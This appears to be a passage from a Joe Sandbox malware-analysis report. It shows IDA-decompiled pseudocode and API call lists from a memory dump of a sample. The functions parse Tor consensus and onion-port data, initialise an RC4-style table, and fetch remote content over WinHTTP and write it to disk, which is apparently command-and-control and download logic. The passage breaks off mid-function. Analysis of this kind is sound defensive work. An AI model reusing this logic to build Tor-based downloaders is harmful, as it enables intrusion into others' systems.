    							_v16 = _t124;
    							if(_t124 == 0) {
    								break;
    							}
    							_t125 =  *0x3b8538(0x1000);
    							 *_v24 = _t125;
    							memset(_t125, 0, 0x1000);
    							memcpy( *_v24, _v12, _v16 - _v12 + 0x1c);
    							_v28 = _v28 + 1;
    							_v24 =  &(_v24[8]);
    							_t87 = strstr( &(_v16[1]), _t139);
    							_t197 = _t197 + 0x24;
    							if(_t87 != 0) {
    								continue;
    							}
    							break;
    						}
    						if(_v8 != _v28 || _v8 == 0) {
    							goto L27;
    						} else {
    							_t141 = _a8;
    							 *_t141 =  *_t141 & 0x00000000;
    							_t192 = "\n";
    							_v20 = strtok(_v32, _t192);
    							_t94 = strtok(0, _t192);
    							_t198 = _t197 + 0x10;
    							while(1) {
    								_v24 = _t94;
    								if(_t94 == 0) {
    									break;
    								}
    								_t96 = sscanf(_v24, "onion-port %5s",  &_v52);
    								_t198 = _t198 + 0xc;
    								if(_t96 != 1) {
    									L23:
    									_v20 = _v24;
    									_t94 = strtok(0, _t192);
    									continue;
    								}
    								_t190 = _a4;
    								_t101 = sscanf(_v20, "ip-address %15s", ( *_t141 << 5) + _t190);
    								_t199 = _t198 + 0xc;
    								if(_t101 != 1) {
    									goto L28;
    								}
    								_t158 = ( *_t141 << 5) + _t190;
    								_t183 = _t158 - 1;
    								do {
    									_t102 =  *((intOrPtr*)(_t183 + 1));
    									_t183 = _t183 + 1;
    								} while (_t102 != 0);
    								_t103 =  &_v52;
    								asm("movsw");
    								_t194 = _t103;
    								do {
    									_t173 =  *_t103;
    									_t103 = _t103 + 1;
    								} while (_t173 != 0);
    								_t104 = _t103 - _t194;
    								_t159 = _t158 - 1;
    								do {
    									_t174 =  *(_t159 + 1);
    									_t159 = _t159 + 1;
    								} while (_t174 != 0);
    								_t161 = _t104 >> 2;
    								_t108 = memcpy(_t194 + _t161 + _t161, _t194, memcpy(_t159, _t194, _t161 << 2) & 0x00000003);
    								_t198 = _t199 + 0x18;
    								 *_t141 = _t108;
    								_t192 = "\n";
    								goto L23;
    							}
    							if( *_t141 != _v8) {
    								goto L27;
    							}
    							 *0x3b8540(_v32);
    							 *0x3b8540(_v36);
    							_t76 = 1;
    							L36:
    							return _t76;
    						}
    					}
    				}
    				return _t73;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003A4DC1(char* _a4) {
    				signed int _v8;
    				intOrPtr* _v12;
    				char* _v16;
    				char* _v20;
    				char* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char* _v36;
    				intOrPtr* _t53;
    				intOrPtr _t54;
    				intOrPtr _t55;
    				char* _t63;
    				intOrPtr _t69;
    				int _t70;
    				intOrPtr _t72;
    				intOrPtr _t73;
    				void* _t75;
    				int _t77;
    				intOrPtr* _t78;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				char _t102;
    				intOrPtr _t104;
    				void* _t105;
    				char* _t107;
    				intOrPtr _t108;
    				void* _t109;
    				char* _t111;
    				void* _t112;
    				void* _t115;
    				void* _t116;
    
    				_v24 = 0;
    				_t53 =  *0x3b8538(0x80);
    				_v12 = _t53;
    				_t54 =  *0x3b8538(0x80);
    				_v32 = _t54;
    				_t55 =  *0x3b8538(0x80);
    				_t111 = "\n";
    				_v28 = _t55;
    				_v36 = 0;
    				_v16 = strtok(_a4, _t111);
    				_t107 = strtok(0, _t111);
    				_t116 = _t115 + 0x1c;
    				_v20 = _t107;
    				if(_t107 == 0) {
    					L24:
    					_t112 = 0;
    				} else {
    					_v8 = _v8 & 0x00000000;
    					L3:
    					while(1) {
    						if( *_t107 != 0x73 || _t107[1] != 0x20) {
    							L20:
    							_v36 = _v16;
    							_v16 = _t107;
    							_t63 = strtok(0, _t111);
    							_v20 = _t63;
    							if(_t63 != 0) {
    								_t107 = _v20;
    								continue;
    							} else {
    								_t80 = _v24;
    								if(_t80 == 0) {
    									goto L24;
    								} else {
    									 *0x3b8ac4 = _t80;
    									_t112 = 1;
    								}
    							}
    						} else {
    							if(strstr(_t107, "HSDir") == 0) {
    								if(strstr(_t107, "Valid") == 0 || strstr(_t107, "Running") == 0 || strstr(_t107, "Fast") == 0 || strstr(_t107, "Stable") == 0) {
    									goto L20;
    								} else {
    									_t69 =  *0x3b8ac0; // 0x0
    									 *((intOrPtr*)(_v8 + _t69 + 0x70)) = 1;
    									goto L12;
    								}
    							} else {
    								_t79 =  *0x3b8ac0; // 0x0
    								 *(_v8 + _t79 + 0x70) =  *(_v8 + _t79 + 0x70) & 0x00000000;
    								L12:
    								_push(_v28);
    								_t108 = _v12;
    								_push(_v32);
    								_push(_t108);
    								_t70 = sscanf(_v36, "%*[^ ] %*[^ ] %27[^ ] %*[^ ] %*[^ ] %15[^ ] %5s");
    								_t116 = _t116 + 0x14;
    								if(_t70 != 3) {
    									goto L24;
    								} else {
    									sprintf(_v8 +  *0x3b8ac0, "%s:%s", _v32, _v28);
    									_t116 = _t116 + 0x10;
    									_t109 = _t108 - 1;
    									do {
    										_t72 =  *((intOrPtr*)(_t109 + 1));
    										_t109 = _t109 + 1;
    									} while (_t72 != 0);
    									_t73 =  *0x3b8ac0; // 0x0
    									_t31 = _t73 + 0x18; // 0x18
    									_push(_v8 + _t31);
    									_push(_v12);
    									asm("movsw");
    									_t75 = 0x14;
    									asm("movsb");
    									if(E003A3933(_t75, _v8) != 0x14) {
    										goto L24;
    									} else {
    										_push(_v12);
    										_t77 = sscanf(_v16, "%*[^ ] %43[^ ]");
    										_t116 = _t116 + 0xc;
    										if(_t77 != 1) {
    											goto L24;
    										} else {
    											_t78 = _v12;
    											_t104 =  *0x3b8ac0; // 0x0
    											_t38 = _t104 + 0x2c; // 0x2c
    											_t105 = _v8 - _t78 + _t38;
    											do {
    												_t102 =  *_t78;
    												 *((char*)(_t105 + _t78)) = _t102;
    												_t78 = _t78 + 1;
    											} while (_t102 != 0);
    											_v24 = _v24 + 1;
    											_v8 = _v8 + 0x74;
    											_t107 = _v20;
    											_t111 = "\n";
    											goto L20;
    										}
    									}
    								}
    							}
    						}
    						goto L23;
    					}
    				}
    				L23:
    				 *0x3b8540(_v28);
    				 *0x3b8540(_v32);
    				 *0x3b8540(_v12);
    				return _t112;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 86%
    			E003AE97F() {
    				char _v404;
    				long _v408;
    				char _t11;
    				signed int _t12;
    				_Unknown_base(*)()* _t20;
    				signed int _t25;
    				signed char _t28;
    				struct HINSTANCE__* _t31;
    				signed int _t39;
    				void* _t41;
    
    				_t41 = (_t39 & 0xfffffff8) - 0x194;
    				_v408 = GetTickCount();
    				_t11 = 0;
    				do {
    					 *((char*)(_t11 + 0x3b89b0)) = _t11;
    					_t11 = _t11 + 1;
    				} while (_t11 != 0x100);
    				_t25 = 0;
    				_t12 = 0;
    				do {
    					_t3 = _t12 + 0x3b89b0; // 0x0
    					_t28 =  *_t3;
    					_t25 = _t25 + ( *(_t41 + (_t12 & 0x00000003) + 0xc) & 0x000000ff) + (_t28 & 0x000000ff) & 0x000000ff;
    					_t6 = _t25 + 0x3b89b0; // 0x0
    					 *((char*)(_t12 + 0x3b89b0)) =  *_t6;
    					_t12 = _t12 + 1;
    					 *(_t25 + 0x3b89b0) = _t28;
    				} while (_t12 != 0x100);
    				 *0x3b89a0 =  *0x3b89a0 & 0x00000000;
    				 *0x3b89a4 =  *0x3b89a4 & 0x00000000;
    				__imp__#115(0x202,  &_v404);
    				_t31 = LoadLibraryA("Advapi32.dll");
    				 *0x3b89a8 = GetProcAddress(_t31, "MD5Init");
    				 *0x3b89ac = GetProcAddress(_t31, "MD5Update");
    				 *0x3b8ab8 = GetProcAddress(_t31, "MD5Final");
    				 *0x3b8ab4 = GetProcAddress(_t31, "A_SHAInit");
    				 *0x3b899c = GetProcAddress(_t31, "A_SHAUpdate");
    				_t20 = GetProcAddress(_t31, "A_SHAFinal");
    				 *0x3b8ab0 = _t20;
    				return _t20;
    			}














    APIs
    • GetTickCount.KERNEL32(0000000E,00000001,003A03C4), ref: 003AE98E
    • WSAStartup.WS2_32(00000202,?), ref: 003AE9FA
    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 003AEA05
    • GetProcAddress.KERNEL32(00000000,MD5Init), ref: 003AEA19
    • GetProcAddress.KERNEL32(00000000,MD5Update), ref: 003AEA26
    • GetProcAddress.KERNEL32(00000000,MD5Final), ref: 003AEA33
    • GetProcAddress.KERNEL32(00000000,A_SHAInit), ref: 003AEA40
    • GetProcAddress.KERNEL32(00000000,A_SHAUpdate), ref: 003AEA4D
    • GetProcAddress.KERNEL32(00000000,A_SHAFinal), ref: 003AEA5A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 44%
    			E003971D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
    				void* _v8;
    				char _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				int _v28;
    				int _v32;
    				char _v36;
    				int _v40;
    				char _v44;
    				char _v72;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				signed int _v124;
    				void _v132;
    				char _v852;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr _t89;
    				intOrPtr _t90;
    				void* _t99;
    				void* _t101;
    				void* _t103;
    				void* _t105;
    				void* _t109;
    				intOrPtr _t110;
    				intOrPtr _t113;
    				signed int _t115;
    				intOrPtr _t117;
    				char* _t118;
    				intOrPtr _t120;
    				intOrPtr _t121;
    				intOrPtr _t123;
    				char* _t161;
    				signed int _t163;
    				intOrPtr _t164;
    				intOrPtr _t166;
    				void* _t168;
    				void* _t169;
    				void* _t171;
    
    				_v40 = 0;
    				_v28 = 0;
    				_t161 = 0;
    				_v8 = 0;
    				_t166 = 0;
    				_v44 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v32 = 0;
    				_t82 = memset( &_v132, 0, 0x3c);
    				_t169 = _t168 + 0xc;
    				_t83 = _t82 | 0xffffffff;
    				_v132 = 0x3c;
    				_v124 = _t83;
    				_v112 = _t83;
    				_v84 = _t83;
    				__imp__WinHttpCrackUrl(_a4, 0, 0,  &_v132, __edi, __esi, __ebx);
    				if(_t83 == 0) {
    					L46:
    					_t84 = _v12;
    					if(_v12 != 0) {
    						E0039BB40(_t84);
    					}
    					return _v32;
    				}
    				_t87 = _v112;
    				if(_v112 != 0 || _v84 != 0) {
    					_t89 = E003A1D90(_t87 + _t87 + 2, 0);
    					_t169 = _t169 + 8;
    					_v16 = _t89;
    					if(_t89 == 0) {
    						goto L46;
    					}
    					_t90 = E003A1D90(_v84 + _v84 + 2, 0);
    					_t171 = _t169 + 8;
    					_v20 = _t90;
    					_t176 = _t90;
    					if(_t90 == 0) {
    						L44:
    						E0039BB40(_v16);
    						_t92 = _v20;
    						_t169 = _t171 + 4;
    						if(_v20 != 0) {
    							E0039BB40(_t92);
    							_t169 = _t169 + 4;
    						}
    						goto L46;
    					}
    					E0039D620(_v16, _v112 + 1, _v116);
    					E0039D620(_v20, _v84 + 1, _v88);
    					_t99 = E003B1280(_t176, _v16);
    					_t171 = _t171 + 4;
    					_t177 = _t99;
    					if(_t99 != 0) {
    						L003B1DC0( &_v72);
    						_t101 = E003B1B60( &_v72, _v16, 0x50);
    						__eflags = _t101;
    						if(_t101 != 0) {
    							_t103 = E003B1B30(_v20,  &_v24);
    							__eflags = _t103;
    							if(_t103 != 0) {
    								_v36 = 0;
    								_t105 = E003B1C30( &_v72,  &_v12,  &_v36);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									__eflags = _v24 + 0xffffff38 - 0x1a;
    									_t142 =  &_v72;
    									if(_v24 + 0xffffff38 > 0x1a) {
    										L28:
    										E003B1730(_t142);
    										goto L44;
    									}
    									_t166 = _v36;
    									E003B1730( &_v72);
    									L35:
    									_t109 = E00391A80(_t142, _a8, _v12, _t166);
    									_t171 = _t171 + 0xc;
    									if(_t109 != 0) {
    										_v32 = 1;
    									}
    									L37:
    									if(_t161 != 0) {
    										__imp__WinHttpCloseHandle(_t161);
    									}
    									L39:
    									_t163 = _v28;
    									L40:
    									if(_t163 != 0) {
    										__imp__WinHttpCloseHandle(_t163);
    									}
    									L42:
    									_t110 = _v40;
    									if(_t110 != 0) {
    										__imp__WinHttpCloseHandle(_t110);
    									}
    									goto L44;
    								}
    								E003B1730( &_v72);
    								goto L44;
    							}
    							E003B1730( &_v72);
    							goto L44;
    						}
    						_t142 =  &_v72;
    						goto L28;
    					}
    					_t113 = E00399090(_t177,  &_v852, 0x49);
    					_t171 = _t171 + 8;
    					__imp__WinHttpOpen( &_v852, 0, 0, 0, 0);
    					_t164 = _t113;
    					_v40 = _t164;
    					if(_t164 == 0) {
    						goto L44;
    					}
    					_t115 = _a12 * 0xea60;
    					__imp__WinHttpSetTimeouts(_t164, 0x15f90, 0x15f90, 0x2bf20, _t115);
    					__imp__WinHttpConnect(_t164, _v16, 0, 0);
    					_t163 = _t115;
    					_v28 = _t163;
    					_t179 = _t163;
    					if(_t163 == 0) {
    						goto L42;
    					}
    					E00399090(_t179,  &_v852, 0x69);
    					_t117 = _v120;
    					_t171 = _t171 + 8;
    					if(_t117 != 1) {
    						__eflags = _t117 - 2;
    						if(_t117 != 2) {
    							goto L40;
    						} else {
    							_push(0x800000);
    							_push(0);
    							_push(0);
    							_push(0);
    							_push(_v20);
    							_t118 =  &_v852;
    							_push(_t118);
    							goto L12;
    						}
    					} else {
    						_t118 = _v20;
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(_t118);
    						_push( &_v852);
    						L12:
    						__imp__WinHttpOpenRequest(_t163);
    						_t161 = _t118;
    						if(_t161 == 0) {
    							goto L39;
    						}
    						__imp__WinHttpSendRequest(_t161, 0, 0, 0, 0, 0, 0);
    						if(_t118 == 0) {
    							goto L37;
    						}
    						__imp__WinHttpReceiveResponse(_t161, 0);
    						if(_t118 == 0) {
    							goto L37;
    						}
    						_v8 = 4;
    						__imp__WinHttpQueryHeaders(_t161, 0x20000013, 0,  &_v24,  &_v8, 0);
    						if(_t118 == 0) {
    							goto L37;
    						}
    						_t120 = _v24 + 0xffffff38;
    						if(_t120 <= 0x1a) {
    							while(1) {
    								_t142 =  &_v8;
    								_v8 = 0;
    								__imp__WinHttpQueryDataAvailable(_t161,  &_v8);
    								if(_t120 == 0) {
    									goto L37;
    								}
    								_t121 = _v8;
    								if(_t121 == 0) {
    									goto L35;
    								}
    								_t166 = _t166 + _t121;
    								_t122 = _v12;
    								if(_v12 == 0) {
    									_t120 = E003A1D90(_t166, 0);
    									_t171 = _t171 + 8;
    									_v12 = _t120;
    								} else {
    									_t123 = E003A1D90(_t166, _t122);
    									_v12 = _t123;
    									_t171 = _t171 + 8;
    									_t120 = _t123 - _v8 + _t166;
    								}
    								_t142 = _v8;
    								__imp__WinHttpReadData(_t161, _t120, _v8,  &_v44);
    								if(_t120 == 0) {
    									goto L37;
    								} else {
    									if(_v8 > 0) {
    										continue;
    									} else {
    										goto L35;
    									}
    								}
    							}
    						}
    						goto L37;
    					}
    				} else {
    					goto L46;
    				}
    			}















































    APIs
    • memset.MSVCRT ref: 003971FE
    • WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,003943BC,?), ref: 00397223
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003943BC,?), ref: 003972CA
    • WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,0039D19E,?,?,?,?,?,?,?,?,003943BC,?), ref: 003972F7
    • WinHttpConnect.WINHTTP(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,003943BC,?), ref: 00397304
    • WinHttpOpenRequest.WINHTTP(00000000,?,0039D19E,00000000,00000000,00000000,00800000,?,?,?,?,?), ref: 0039735E
    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00397375
    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,?,?,003943BC,?), ref: 00397385
    • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?), ref: 003973AA
    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,?,?,?,?,?,003943BC,?), ref: 003973D8
    • WinHttpReadData.WINHTTP(00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 00397425
      • Part of subcall function 003B1C30: memcpy.MSVCRT ref: 003B1C65
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • WinHttpCloseHandle.WINHTTP(00000000,?,?,00000050,?,?,?,?,?,?,003943BC,?), ref: 003974D7
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003943BC,?), ref: 003974E5
    • WinHttpCloseHandle.WINHTTP(?,?,?,00000050,?,?,?,?,?,?,003943BC,?), ref: 003974F3
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003B1820(void* __ebx, intOrPtr* __ecx, void* _a4, char _a8, char _a10, char _a11, int _a12, char _a16, intOrPtr* _a20) {
    				void* _v8;
    				intOrPtr _v12;
    				char _v16;
    				char _v24;
    				char _v32;
    				char _v44;
    				char _v68;
    				char _v196;
    				intOrPtr _t81;
    				void* _t82;
    				void* _t83;
    				void* _t85;
    				void* _t88;
    				char* _t101;
    				int _t105;
    				void* _t110;
    				char* _t112;
    				void* _t114;
    				void* _t118;
    				void* _t121;
    				void* _t124;
    				char _t131;
    				void* _t132;
    				char* _t134;
    				void* _t136;
    				intOrPtr _t140;
    				intOrPtr _t143;
    				intOrPtr _t144;
    				char* _t147;
    				intOrPtr _t149;
    				char _t167;
    				intOrPtr _t172;
    				intOrPtr _t178;
    				void* _t180;
    				void* _t182;
    				intOrPtr* _t183;
    				void* _t184;
    				void* _t185;
    				void* _t187;
    				void* _t188;
    				void* _t189;
    
    				_t183 = __ecx;
    				_v12 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x20))))() == 0) {
    					return 0;
    				} else {
    					_t81 =  *0x3b8628; // 0x593938
    					_t180 = _a4;
    					_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0xc))))(_t180, __ebx);
    					_t140 =  *0x3b8628; // 0x593938
    					_v8 = _t82;
    					_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))(_a8);
    					_t131 = _a16;
    					if(_t83 + _v8 + _t131 + 0x400 >= 0x400) {
    						_t143 =  *0x3b8628; // 0x593938
    						_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t143 + 0xc))))(_t180);
    						_t144 =  *0x3b8628; // 0x593938
    						_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))(_a8) + _t131 + _t85 + 0x400;
    					} else {
    						_t88 = 0x400;
    					}
    					_t132 = E003A1D90(_t88, 0);
    					_v8 = _t132;
    					_t182 = E003A1D90(0x10000, 0);
    					_t185 = _t184 + 0x10;
    					if(_t182 == 0) {
    						L27:
    						__eflags = _t132;
    						if(_t132 != 0) {
    							E0039BB40(_t132);
    							_t185 = _t185 + 4;
    						}
    					} else {
    						_t193 = _t132;
    						if(_t132 != 0) {
    							E00396CB0( &_v196, 0xd1);
    							E00396CB0( &_v24, 0xd2);
    							E00396CB0( &_v16, 0xd3);
    							E00399090(_t193,  &_v44, 0xd4);
    							E00396CB0( &_v32, 0xd4);
    							_t167 = _a8;
    							_t187 = _t185 + 0x28;
    							if(_t167 != 0) {
    								_t147 = 0x3b33e8;
    							} else {
    								_t167 =  &_v44;
    								_t147 = 0x3b33eb;
    							}
    							_t27 =  &_v24; // 0x397471
    							_t101 = _t27;
    							if(_a12 == 0) {
    								_t101 =  &_v16;
    							}
    							wsprintfA(_t132,  &_v196, _t101, _a4,  *((intOrPtr*)(_t183 + 8)), _t147, _t167);
    							E00396CB0( &_v68, 0xd5);
    							_t105 = _a12;
    							_t188 = _t187 + 0x24;
    							if(_t105 != 0) {
    								_t34 =  &_a16; // 0x397471
    								_t178 =  *0x3b8628; // 0x593938
    								memcpy( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x10c))))( *_t34) + _t132, _t132, _t105);
    								_t188 = _t188 + 0xc;
    							}
    							while(1) {
    								L14:
    								_t149 =  *0x3b8628; // 0x593938
    								_v12 = E003A6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
    								memset(_t182, 0, 0x10000);
    								_t189 = _t188 + 0x18;
    								 *(_t183 + 0x14) = 0;
    								while(1) {
    									L15:
    									_t110 = E003A64AC( *((intOrPtr*)(_t183 + 4)), _t182 +  *(_t183 + 0x14), 1);
    									_t185 = _t189 + 0xc;
    									if(_t110 == 0) {
    										goto L27;
    									}
    									_t112 = strstr(_t182,  &_v32);
    									_t188 = _t185 + 8;
    									if(_t112 != 0) {
    										L19:
    										 *(_t183 + 0x18) =  *(_t183 + 0x14);
    										_t172 =  *0x3b8628; // 0x593938
    										_t114 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x10c))))(_t182);
    										__eflags = _t114 - 0xc;
    										if(_t114 <= 0xc) {
    											L14:
    											_t149 =  *0x3b8628; // 0x593938
    											_v12 = E003A6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
    											memset(_t182, 0, 0x10000);
    											_t189 = _t188 + 0x18;
    											 *(_t183 + 0x14) = 0;
    											continue;
    										} else {
    											L20:
    											_a8 =  *((intOrPtr*)(_t182 + 9));
    											_a10 =  *((intOrPtr*)(_t182 + 0xb));
    											_a11 = 0;
    											 *_a20 = atoi( &_a8);
    											_t134 = strstr(_t182,  &_v68);
    											_t185 = _t188 + 0xc;
    											__eflags = _t134;
    											if(_t134 == 0) {
    												L26:
    												_t132 = _v8;
    											} else {
    												_t118 = strstr(_t134, 0x3b33e8);
    												_t188 = _t185 + 8;
    												_a4 = _t118;
    												__eflags = _t118;
    												if(_t118 == 0) {
    													L13:
    													_t132 = _v8;
    													do {
    														goto L14;
    													} while (_t114 <= 0xc);
    													goto L20;
    												} else {
    													 *_t118 = 0;
    													_t136 = atoi( &(_t134[0x10]));
    													_t188 = _t188 + 4;
    													 *_a4 = 0xd;
    													__eflags = _t136;
    													if(_t136 == 0) {
    														goto L13;
    													} else {
    														_t121 = E003A1D90( *(_t183 + 0x14) + _t136 + 2, 0);
    														_t185 = _t188 + 8;
    														 *(_t183 + 0x10) = _t121;
    														__eflags = _t121;
    														if(_t121 != 0) {
    															memcpy(_t121, _t182,  *(_t183 + 0x14) + 1);
    															_t124 = E003A64AC( *((intOrPtr*)(_t183 + 4)),  *(_t183 + 0x10) +  *(_t183 + 0x14) + 1, _t136);
    															_t185 = _t185 + 0x18;
    															__eflags = _t124;
    															if(_t124 != 0) {
    																_t71 = _t183 + 0x14;
    																 *_t71 =  *(_t183 + 0x14) + _t136 + 1;
    																__eflags =  *_t71;
    																 *((char*)( *(_t183 + 0x10) +  *(_t183 + 0x14))) = 0;
    																_v12 = 1;
    															}
    														}
    														goto L26;
    													}
    												}
    											}
    										}
    									} else {
    										 *(_t183 + 0x14) =  *(_t183 + 0x14) + 1;
    										if( *(_t183 + 0x14) < 0x10000) {
    											continue;
    										} else {
    											while(1) {
    												L14:
    												_t149 =  *0x3b8628; // 0x593938
    												_v12 = E003A6487( *((intOrPtr*)(_t183 + 4)), _t132,  *((intOrPtr*)( *((intOrPtr*)(_t149 + 0x10c))))(_t132));
    												memset(_t182, 0, 0x10000);
    												_t189 = _t188 + 0x18;
    												 *(_t183 + 0x14) = 0;
    												goto L15;
    											}
    										}
    										goto L29;
    									}
    									goto L27;
    								}
    								goto L27;
    							}
    						}
    					}
    					L29:
    					__eflags = _t182;
    					if(_t182 != 0) {
    						E0039BB40(_t182);
    					}
    					return _v12;
    				}
    			}













































    APIs
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • wsprintfA.USER32 ref: 003B194C
    • memcpy.MSVCRT ref: 003B1981
    • memset.MSVCRT ref: 003B19C8
    • strstr.MSVCRT ref: 003B19F8
    • atoi.MSVCRT ref: 003B1A47
    • strstr.MSVCRT ref: 003B1A57
    • strstr.MSVCRT ref: 003B1A70
    • atoi.MSVCRT ref: 003B1A8B
    • memcpy.MSVCRT ref: 003B1AC4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 76%
    			E003A4BDF(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
    				char* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				int _v68;
    				void _v72;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t53;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t62;
    				void* _t77;
    				void* _t78;
    				intOrPtr _t82;
    				void* _t90;
    				intOrPtr _t106;
    				int _t111;
    				char* _t112;
    				intOrPtr _t113;
    				void* _t118;
    				void* _t119;
    				void* _t120;
    				void* _t123;
    
    				_t53 =  *0x3b8538(0x400);
    				_v8 = _t53;
    				_v16 =  *0x3b8538(0x400);
    				_t55 = _a8;
    				_t90 = _t55 + 1;
    				do {
    					_t106 =  *_t55;
